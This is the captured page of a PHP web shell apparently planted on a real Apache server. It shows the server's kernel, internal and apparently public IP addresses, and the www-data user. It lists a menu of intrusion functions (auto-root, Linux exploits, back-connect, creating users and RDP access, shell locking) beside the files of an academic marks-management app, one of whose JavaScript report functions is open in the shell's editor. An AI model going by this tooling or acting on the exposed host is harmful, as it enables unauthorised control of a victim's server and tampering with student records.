Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.139.70.69
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
oasis /
custom_js_old /
[ HOME SHELL ]
Name
Size
Permission
Action
OnloadModule.js
639
B
-rwxr-xr-x
PasswordPopup.js
1.02
KB
-rwxr-xr-x
PreMultipleSaveValidation.js
306
B
-rwxr-xr-x
PreSaveModuleValidation.js
362
B
-rwxr-xr-x
batch_close.js
7.59
KB
-rwxr-xr-x
batch_setup.js
9.63
KB
-rwxr-xr-x
dash_board.js
616
B
-rwxr-xr-x
deviation_report.js
1.02
KB
-rwxr-xr-x
download_upload_mannual.js
2.04
KB
-rwxr-xr-x
evaluation.js
16.5
KB
-rwxr-xr-x
evaluationreport.js
711
B
-rwxr-xr-x
freeze_marks.js
2.89
KB
-rwxr-xr-x
gandhiGridValidation.js
310
B
-rwxr-xr-x
include_js.js
5
B
-rwxr-xr-x
marks_deviation_report.js
1.11
KB
-rwxr-xr-x
month_year.js
1.52
KB
-rwxr-xr-x
postSaveSchemaGroupDetails.js
265
B
-rwxr-xr-x
practical_entry_freezing.js
13.45
KB
-rwxr-xr-x
practical_entry_freezing_new.j...
13.32
KB
-rwxr-xr-x
practical_marks.js
9.53
KB
-rwxr-xr-x
practical_marks_mis.js
17.38
KB
-rwxr-xr-x
practical_report_popups.js
3.49
KB
-rwxr-xr-x
preCustomGridEditValidation.js
361
B
-rwxr-xr-x
report_setup.js
21.89
KB
-rwxr-xr-x
report_setup_popup.js
4.58
KB
-rwxr-xr-x
revaluation_report.js
527
B
-rwxr-xr-x
user_report.js
5.3
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : marks_deviation_report.js
function CallEnableMarksDeviationReport() { $("#page_main_div").load( "../html_modules/marks_deviation_report.html", function() { document.getElementById("display_module_name").innerHTML = "Marks Deviation Report"; document.getElementById("module_name_for_save").value = "Marks Deviation Report"; $("#from_college_code").val(getCookie("college_code")); $("#to_college_code").val(getCookie("college_code")); if (getCookie("user_type") == "SuperUser") { $("#from_college_code").removeAttr("disabled", "disabled"); $("#to_college_code").removeAttr("disabled", "disabled"); } getDefaultHeadFooterLinks("Marks Deviation Report"); } ); } function GenerateMarkDeviationReport() { var str = "&from_college_code=" + trim($("#from_college_code").val()); str += "&to_college_code=" + trim($("#to_college_code").val()); str += "&from_qp_code=" + $("#from_qp_code").val(); str += "&to_qp_code=" + trim($("#to_qp_code").val()); //alert(str); window.location.href = $host_url + "GenerateMarkDeviationReport" + str; }
Close